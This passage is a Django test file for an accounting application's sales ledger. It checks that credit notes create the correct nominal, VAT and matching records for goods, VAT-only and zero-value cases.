from vat.models import Vat, VatTransaction
# Form/formset prefixes used when building POST data for the create view.
HEADER_FORM_PREFIX = "header"
LINE_FORM_PREFIX = "line"
match_form_prefix = "match"
# Module code stamped on sales-ledger nominal and vat transactions.
SL_MODULE = "SL"
# Date format accepted by the transaction forms (day first).
DATE_INPUT_FORMAT = '%d-%m-%Y'
# Date format used when writing directly to model fields (ISO order).
MODEL_DATE_INPUT_FORMAT = '%Y-%m-%d'
def match(match_by, matched_to):
    """Match ``match_by`` against ``matched_to`` and persist the result.

    ``matched_to`` is an iterable of ``(header, value)`` pairs.  Each
    target header has its ``due``/``paid`` adjusted by its value, a
    ``SaleMatching`` row is created per pair, and ``match_by`` absorbs
    the aggregate matched value.  Returns ``(match_by, updated_headers)``.
    """
    updated_headers = []
    match_records = []
    total_matched = 0
    for target, value in matched_to:
        total_matched += value
        target.due -= value
        target.paid = target.total - target.due
        match_records.append(
            SaleMatching(
                matched_by=match_by,
                matched_to=target,
                value=value,
                period=match_by.period
            )
        )
        updated_headers.append(target)
    # The matching transaction itself moves in the opposite direction.
    match_by.due = match_by.total + total_matched
    match_by.paid = match_by.total - match_by.due
    SaleHeader.objects.bulk_update(
        updated_headers + [match_by], ['due', 'paid'])
    SaleMatching.objects.bulk_create(match_records)
    return match_by, updated_headers
def create_cancelling_headers(n, customer, ref_prefix, type, value, period):
    """
    Create n headers which cancel out with total = value
    Where n is an even number
    """
    now = timezone.now()
    due_by = now + timedelta(days=31)
    half = int(n / 2)
    headers = []
    # Build the positive half first, then the negative half, so the
    # whole batch nets to zero.
    for sign in (1, -1):
        for idx in range(half):
            headers.append(
                SaleHeader(
                    customer=customer,
                    ref=ref_prefix + str(idx),
                    goods=sign * value,
                    discount=0,
                    vat=0,
                    total=sign * value,
                    paid=0,
                    due=sign * value,
                    date=now,
                    due_date=due_by,
                    type=type,
                    period=period
                )
            )
    return SaleHeader.objects.bulk_create(headers)
class CreateCreditNoteNominalEntries(TestCase):
    @classmethod
    def setUpTestData(cls):
        """Create the shared fixtures: user, customer, period, nominal
        tree, vat code and module settings used by every test below."""
        cls.user = get_user_model().objects.create_superuser(username="dummy", password="dummy")
        cls.factory = RequestFactory()
        cls.customer = Customer.objects.create(name="test_customer")
        cls.ref = "test matching"
        # Form-facing (d-m-Y) and model-facing (Y-m-d) renderings of the
        # same transaction/due dates.
        cls.date = datetime.now().strftime(DATE_INPUT_FORMAT)
        cls.due_date = (datetime.now() + timedelta(days=31)).strftime(DATE_INPUT_FORMAT)
        cls.model_date = datetime.now().strftime(MODEL_DATE_INPUT_FORMAT)
        cls.model_due_date = (datetime.now() + timedelta(days=31)).strftime(MODEL_DATE_INPUT_FORMAT)
        fy = FinancialYear.objects.create(financial_year=2020)
        cls.period = Period.objects.create(fy=fy, period="01", fy_and_period="202001", month_start=date(2020,1,31))
        cls.description = "a line description"
        # ASSETS
        assets = Nominal.objects.create(name="Assets")
        current_assets = Nominal.objects.create(
            parent=assets, name="Current Assets")
        cls.nominal = Nominal.objects.create(
            parent=current_assets, name="Bank Account")
        cls.sale_control = Nominal.objects.create(
            parent=current_assets, name="Sales Ledger Control"
        )
        # LIABILITIES
        liabilities = Nominal.objects.create(name="Liabilities")
        current_liabilities = Nominal.objects.create(
            parent=liabilities, name="Current Liabilities")
        cls.vat_nominal = Nominal.objects.create(
            parent=current_liabilities, name="Vat")
        cls.vat_code = Vat.objects.create(
            code="1", name="standard rate", rate=20)
        cls.url = reverse("sales:create")
        # All ledgers post into the same (only) period in these tests.
        ModuleSettings.objects.create(
            cash_book_period=cls.period,
            nominals_period=cls.period,
            purchases_period=cls.period,
            sales_period=cls.period
        )
# CORRECT USAGE
# Each line has a goods value above zero and the vat is 20% of the goods
def test_nominals_created_for_lines_with_goods_and_vat_above_zero(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
matching_data = create_formset_data(match_form_prefix, [])
line_forms = ([{
'description': self.description,
'goods': 100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
header = headers[0]
self.assertEqual(
header.total,
-20 * (100 + 20)
)
self.assertEqual(
header.goods,
-20 * 100
)
self.assertEqual(
header.vat,
-20 * 20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
header.total
)
nom_trans = NominalTransaction.objects.all().order_by("pk")
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
-100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
-20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
-100 + -20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
# Each line has a goods value above zero
# And the vat is a zero value
# We are only testing here that no nominal transactions for zero are created
# We are not concerned about the vat return at all
def test_nominals_created_for_lines_with_goods_above_zero_and_vat_equal_to_zero(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
matching_data = create_formset_data(match_form_prefix, [])
line_forms = ([{
'description': self.description,
'goods': 100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 0
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
header = headers[0]
self.assertEqual(
header.total,
-20 * (100 + 0)
)
self.assertEqual(
header.goods,
-20 * 100
)
self.assertEqual(
header.vat,
-20 * 0
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
header.total
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
-100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
0
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(2 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
None
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(2 * i) + 1]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
# assuming the lines are created in the same order
# as the nominal entries....
goods_trans = nom_trans[::2]
total_trans = nom_trans[1::2]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
-100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
# VAT only invoice
# I.e. goods = 0 and vat = 20 on each analysis line
def test_vat_only_lines_invoice(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
matching_data = create_formset_data(match_form_prefix, [])
line_forms = ([{
'description': self.description,
'goods': 0,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
header = headers[0]
self.assertEqual(
header.total,
-20 * (0 + 20)
)
self.assertEqual(
header.goods,
0 * 100
)
self.assertEqual(
header.vat,
-20 * 20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
header.total
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20
# i.e. 0 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entry for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
0
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
-20
)
self.assertEqual(
line.goods_nominal_transaction,
None
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(2 * i) + 0]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(2 * i) + 1]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
vat_trans = nom_trans[::2]
total_trans = nom_trans[1::2]
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
-20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
# Zero value invoice
# So analysis must cancel out
# A zero value transaction is only permissable if we are matching -- a good check in the system
def test_zero_invoice_with_analysis(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
headers_to_match_against = create_cancelling_headers(
2, self.customer, "match", "si", 100, self.period)
headers_to_match_against_orig = headers_to_match_against
headers_as_dicts = [to_dict(header)
for header in headers_to_match_against]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 100})
matching_forms += add_and_replace_objects([headers_to_match_against[1]], {
"id": "matched_to"}, {"value": -100})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': 20,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': -20
}]) * 10
line_forms += (
[{
'description': self.description,
'goods': -20,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': +20
}] * 10
)
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 3)
header = headers[0]
self.assertEqual(
header.total,
0
)
self.assertEqual(
header.goods,
0
)
self.assertEqual(
header.vat,
0
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
header.total
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
lines_orig = lines
lines = lines_orig[:10]
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
40
# i.e. 20 nominal trans for goods
# i.e. 20 nominal trans for vat
# no nominal control account nominal entry because would be zero value -- WHAT THE WHOLE TEST IS ABOUT !!!
)
# assuming the lines are created in the same order
# as the nominal entries....
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
-20
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(2 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(2 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
None
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
lines = lines_orig[10:]
for i, line in enumerate(lines, 10):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
20
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
-20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(2 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(2 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
None
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
2
)
self.assertEqual(
matches[0].matched_by,
header
)
self.assertEqual(
matches[0].matched_to,
headers[1]
)
self.assertEqual(
matches[0].value,
100
)
goods_and_vat_nom_trans = nom_trans[:40]
positive_goods_trans = goods_and_vat_nom_trans[:20:2]
negative_vat_trans = goods_and_vat_nom_trans[1:20:2]
negative_goods_trans = goods_and_vat_nom_trans[20::2]
positive_vat_trans = goods_and_vat_nom_trans[21::2]
lines = lines_orig[:10]
for i, tran in enumerate(positive_goods_trans):
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
lines = lines_orig[:10]
for i, tran in enumerate(negative_vat_trans):
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
-20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
lines = lines_orig[10:]
for i, tran in enumerate(negative_goods_trans):
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
-20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
lines = lines_orig[10:]
for i, tran in enumerate(positive_vat_trans):
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
lines = lines_orig
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
# Zero value invoice again but this time with no lines
# A zero value transaction is only permissable if we are matching -- a good check in the system
def test_zero_invoice_with_no_analysis(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
headers_to_match_against = create_cancelling_headers(
2, self.customer, "match", "si", 100, self.period)
headers_to_match_against_orig = headers_to_match_against
headers_as_dicts = [to_dict(header)
for header in headers_to_match_against]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 100})
matching_forms += add_and_replace_objects([headers_to_match_against[1]], {
"id": "matched_to"}, {"value": -100})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_data = create_formset_data(LINE_FORM_PREFIX, [])
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 3)
header = headers[0]
self.assertEqual(
header.total,
0
)
self.assertEqual(
header.goods,
0
)
self.assertEqual(
header.vat,
0
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
header.total
)
lines = SaleLine.objects.all()
self.assertEqual(
len(lines),
0
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
0
# i.e. 20 nominal trans for goods
# i.e. 20 nominal trans for vat
# no nominal control account nominal entry because would be zero value -- WHAT THE WHOLE TEST IS ABOUT !!!
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
2
)
self.assertEqual(
matches[0].matched_by,
header
)
self.assertEqual(
matches[0].matched_to,
headers[1]
)
self.assertEqual(
matches[0].value,
100
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
0
)
# INCORRECT USAGE
# No point allowing lines which have no goods or vat
def test_zero_invoice_with_line_but_goods_and_zero_are_both_zero(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
headers_to_match_against = create_cancelling_headers(
2, self.customer, "match", "si", 100, self.period)
headers_to_match_against_orig = headers_to_match_against
headers_as_dicts = [to_dict(header)
for header in headers_to_match_against]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 100})
matching_forms += add_and_replace_objects([headers_to_match_against[1]], {
"id": "matched_to"}, {"value": -100})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': 0,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 0
}])
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 200)
self.assertContains(
response,
'<li class="py-1">Goods and Vat cannot both be zero.</li>',
html=True
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
0
)
"""
Test matching positive invoices now
"""
# CORRECT USAGE
def test_fully_matching_an_invoice(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
receipt = create_receipts(self.customer, "receipt", 1, self.period, -2400)[0]
headers_as_dicts = [to_dict(receipt)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": -2400})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': 100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 2)
receipt = headers[0]
header = headers[1]
self.assertEqual(
header.total,
-20 * (100 + 20)
)
self.assertEqual(
header.goods,
-20 * 100
)
self.assertEqual(
header.vat,
-20 * 20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
-2400
)
self.assertEqual(
header.due,
0
)
self.assertEqual(
receipt.total,
2400
)
self.assertEqual(
receipt.paid,
2400
)
self.assertEqual(
receipt.due,
0
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
-100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
-20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
